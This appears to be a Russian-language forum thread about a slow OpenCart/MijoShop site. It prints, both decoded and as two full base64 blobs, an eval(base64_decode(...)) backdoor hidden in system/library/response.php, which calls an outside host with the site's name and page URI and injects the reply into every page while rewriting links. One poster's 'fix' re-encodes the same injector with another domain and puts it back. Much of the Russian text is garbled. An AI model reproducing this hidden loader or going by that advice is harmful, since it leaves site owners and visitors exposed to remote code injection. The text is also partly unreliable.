Plinio

Проверено в MijoShop: 2.5.4 (OpenCart: 1.5.5.1) модуль рилииет :)

Можно и нужно Нужно заменить файл response.php на нормальный, не взломанный http://opencartforum...oda-na-vashikh/

Неправильно даже сгделал оказывается, потому чтолее правильно написано в разгделе форума: https://opencart-forum.ru/topic/22202-proverka-na-nalichie-vredonosnogo-koda-na-vashikh/

Здравствуйте, негделю тормозил сайт, не мог понять из-за чего. Списался с техподгдержкой 1gb.ru (на этом хостинге у меня сайт) и выяснилось следуюещёе: 1. после усиновки скрипи времени генерации страницы (всивлять в index.php - в начало 1 часть и в конец вторую часть кода): // 1 часть кода <?php // фиксация времени начала генерации страницы $begin = microtime(); // матрица начального времени с секундами и миллисекундами $arrbegin = explode(" ",$begin); // Полное начальное время $allbegin = $arrbegin[1] + $arrbegin[0]; ?> //......код файла index.php згдесь....... // 2 часть кода, сивится в конэто: <?php // фиксация времени осинова $stop = microtime(); // матрица времени осинова с секундами и миллисекундами $arrend = explode(" ",$stop); // Полное время осинова $allend = $arrend[1] + $arrend[0]; // вылииние из конечного времени начального $alltime = $allend - $allbegin; // вывод в браузер времени генерации страницы $format = "Страница сгенерирована за %f секунд"; printf($format,$alltime); ?> понял что страница на сайте грузится 5-6 секунд. 2. После 2 дней полемики с техподгдержкой, мне дали нормальный ответ: В когде сайи, точнее в файле system/library/response.php есть следующая строка: $ouput = eval(base64_decode(тут закодированный скрипт=')); Она находится в самом в конэто, можете сами убедится. Если его расшифровать, то полулим следующий код: function get_page($url){ $agent = 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; ru; rv:1.9.2.9) Gecko/20100824 Firefox/3.6.9'; $ch=curl_init(); curl_setopt ($ch, CURLOPT_URL,$url ); curl_setopt($ch, CURLOPT_USERAGENT, $agent); curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt ($ch,CURLOPT_VERBOSE,false); curl_setopt($ch, CURLOPT_TIMEOUT, 5); $page=curl_exec($ch); $httpcode = curl_getinfo($ch, CURLINFO_HTTP_CODE); curl_close($ch); switch($httpcode){ case '200': return $page; break; case '404'; return false; break; } } if ($ftend = get_page("http://myopencart.net/googlecode/api/api.php?server=".$_SERVER['SERVER_NAME']."&page=".$_SERVER['REQUEST_URI'])){ $find = array("</body>", "</html>", "http://opencart.com", "http://=^_^=.ru", "http://myopencart.ru", "https://opencart-forum.ru", "http://opencart.ru", "http://opencart.by"); $replace = array("", $ftend, "http://myopencart.net", "http://myopencart.net", "http://myopencart.net", "http://myopencart.net", "http://myopencart.net", "http://myopencart.net"); $ouput = str_replace($find, $replace, $ouput); ini_set("display_errors","off"); error_reporting(0); echo $ouput;} else { echo $ouput; } Из которого видно что скрипт обращается к myopencart.net, длкакоторого не прописан IP: $ dig a myopencart.net ; <<>> DiG 9.9.2-P1 <<>> a myopencart.net ;; global options: +cmd ;; Got answer: ;; ->>HEADER<<- opcode: QUERY, status: SERVFAIL, id: 62470 ;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 0 ;; QUESTION SECTION: ;myopencart.net. IN A 3. В итоге на сайте _ttp://www.codenet.ru/services/base64_encode-base64_decode/ расшифровал зашифрованный код, опять же через этот сайт его зашифровал, только вместо myopencart.net, написал myopencart.ru в итоге зашифрованный код усиновил в файл system/library/response.php вместо сирого: 1. Даой был ZnVuY3Rpb24gZ2V0X3BhZ2UoJHVybCl7CiAgICAgICAgJGFnZW50ID0gJ01vemlsbGEvNS4wIChNYWNpbnRvc2g7IFU7IEludGVsIE1hYyBPUyBYIDEwLjU7IHJ1OyBydjoxLjkuMi45KSBHZWNrby8yMDEwMDgyNCBGaXJlZm94LzMuNi45JzsKICAgICAgICAkY2g9Y3VybF9pbml0KCk7CiAgICAgICAgY3VybF9zZXRvcHQgKCRjaCwgQ1VSTE9QVF9VUkwsJHVybCApOwogICAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9VU0VSQUdFTlQsICRhZ2VudCk7CiAgICAgICAgY3VybF9zZXRvcHQgKCRjaCwgQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwgMSk7CiAgICAgICAgY3VybF9zZXRvcHQgKCRjaCxDVVJMT1BUX1ZFUkJPU0UsZmFsc2UpOwogICAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9USU1FT1VULCA1KTsKICAgICAgICAkcGFnZT1jdXJsX2V4ZWMoJGNoKTsKICAgICAgICAkaHR0cGNvZGUgPSBjdXJsX2dldGluZm8oJGNoLCBDVVJMSU5GT19IVFRQX0NPREUpOwogICAgICAgIGN1cmxfY2xvc2UoJGNoKTsKICAgICAgICBzd2l0Y2goJGh0dHBjb2RlKXsKICAgICAgICAgICAgICAgIGNhc2UgJzIwMCc6CiAgICAgICAgICAgICAgICAgICAgICAgIHJldHVybiAkcGFnZTsKICAgICAgICAgICAgICAgIGJyZWFrOwogICAgICAgICAgICAgICAgY2FzZSAnNDA0JzsKICAgICAgICAgICAgICAgICAgICAgICAgcmV0dXJuIGZhbHNlOwogICAgICAgICAgICAgICAgYnJlYWs7CiAgICAgICAgfQp9CgppZiAoJGZ0ZW5kID0gZ2V0X3BhZ2UoImh0dHA6Ly9teW9wZW5jYXJ0Lm5ldC9nb29nbGVjb2RlL2FwaS9hcGkucGhwP3NlcnZlcj0iLiRfU0VSVkVSWydTRVJWRVJfTkFNRSddLiImcGFnZT0iLiRfU0VSVkVSWydSRVFVRVNUX1VSSSddKSl7CiRmaW5kID0gYXJyYXkoIjwvYm9keT4iLCAiPC9odG1sPiIsICJvcGVuY2FydC5jb20iLCAibWF4em9uLnJ1IiwgIm15b3BlbmNhcnQucnUiLCAib3BlbmNhcnRmb3J1bS5ydSIsICJvcGVuY2FydC5ydSIsICJvcGVuY2FydC5ieSIpOwokcmVwbGFjZSA9IGFycmF5KCIiLCAkZnRlbmQsICJteW9wZW5jYXJ0Lm5ldCIsICJteW9wZW5jYXJ0Lm5ldCIsICJteW9wZW5jYXJ0Lm5ldCIsICJteW9wZW5jYXJ0Lm5ldCIsICJteW9wZW5jYXJ0Lm5ldCIsICJteW9wZW5jYXJ0Lm5ldCIpOwokb3VwdXQgPSBzdHJfcmVwbGFjZSgkZmluZCwgJHJlcGxhY2UsICRvdXB1dCk7CmluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwib2ZmIik7CmVycm9yX3JlcG9ydGluZygwKTsKZWNobyAkb3VwdXQ7fQplbHNlIHsKZWNobyAkb3VwdXQ7Cn0= 2 Даой сил ZnVuY3Rpb24gZ2V0X3BhZ2UoJHVybCl7CiAgICAgICAgJGFnZW50ID0gJ01vemlsbGEvNS4wIChNYWNpbnRvc2g7IFU7IEludGVsIE1hYyBPUyBYIDEwLjU7IHJ1OyBydjoxLjkuMi45KSBHZWNrby8yMDEwMDgyNCBGaXJlZm94LzMuNi45JzsKICAgICAgICAkY2g9Y3VybF9pbml0KCk7CiAgICAgICAgY3VybF9zZXRvcHQgKCRjaCwgQ1VSTE9QVF9VUkwsJHVybCApOwogICAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9VU0VSQUdFTlQsICRhZ2VudCk7CiAgICAgICAgY3VybF9zZXRvcHQgKCRjaCwgQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwgMSk7CiAgICAgICAgY3VybF9zZXRvcHQgKCRjaCxDVVJMT1BUX1ZFUkJPU0UsZmFsc2UpOwogICAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9USU1FT1VULCA1KTsKICAgICAgICAkcGFnZT1jdXJsX2V4ZWMoJGNoKTsKICAgICAgICAkaHR0cGNvZGUgPSBjdXJsX2dldGluZm8oJGNoLCBDVVJMSU5GT19IVFRQX0NPREUpOwogICAgICAgIGN1cmxfY2xvc2UoJGNoKTsKICAgICAgICBzd2l0Y2goJGh0dHBjb2RlKXsKICAgICAgICAgICAgICAgIGNhc2UgJzIwMCc6CiAgICAgICAgICAgICAgICAgICAgICAgIHJldHVybiAkcGFnZTsKICAgICAgICAgICAgICAgIGJyZWFrOwogICAgICAgICAgICAgICAgY2FzZSAnNDA0JzsKICAgICAgICAgICAgICAgICAgICAgICAgcmV0dXJuIGZhbHNlOwogICAgICAgICAgICAgICAgYnJlYWs7CiAgICAgICAgfQp9CgppZiAoJGZ0ZW5kID0gZ2V0X3BhZ2UoImh0dHA6Ly9teW9wZW5jYXJ0LnJ1L2dvb2dsZWNvZGUvYXBpL2FwaS5waHA/c2VydmVyPSIuJF9TRVJWRVJbJ1NFUlZFUl9OQU1FJ10uIiZwYWdlPSIuJF9TRVJWRVJbJ1JFUVVFU1RfVVJJJ10pKXsKJGZpbmQgPSBhcnJheSgiPC9ib2R5PiIsICI8L2h0bWw+IiwgIm9wZW5jYXJ0LmNvbSIsICJtYXh6b24ucnUiLCAibXlvcGVuY2FydC5ydSIsICJvcGVuY2FydGZvcnVtLnJ1IiwgIm9wZW5jYXJ0LnJ1IiwgIm9wZW5jYXJ0LmJ5Iik7CiRyZXBsYWNlID0gYXJyYXkoIiIsICRmdGVuZCwgIm15b3BlbmNhcnQucnUiLCAibXlvcGVuY2FydC5ydSIsICJteW9wZW5jYXJ0LnJ1IiwgIm15b3BlbmNhcnQucnUiLCAibXlvcGVuY2FydC5ydSIsICJteW9wZW5jYXJ0LnJ1Iik7CiRvdXB1dCA9IHN0cl9yZXBsYWNlKCRmaW5kLCAkcmVwbGFjZSwgJG91cHV0KTsKaW5pX3NldCgiZGlzcGxheV9lcnJvcnMiLCJvZmYiKTsKZXJyb3JfcmVwb3J0aW5nKDApOwplY2hvICRvdXB1dDt9CmVsc2UgewplY2hvICRvdXB1dDsKfQ== После этого сайт сил грузится за 0,5 - 1 секунду, вместо 5-6. Видимо недорилитка движка.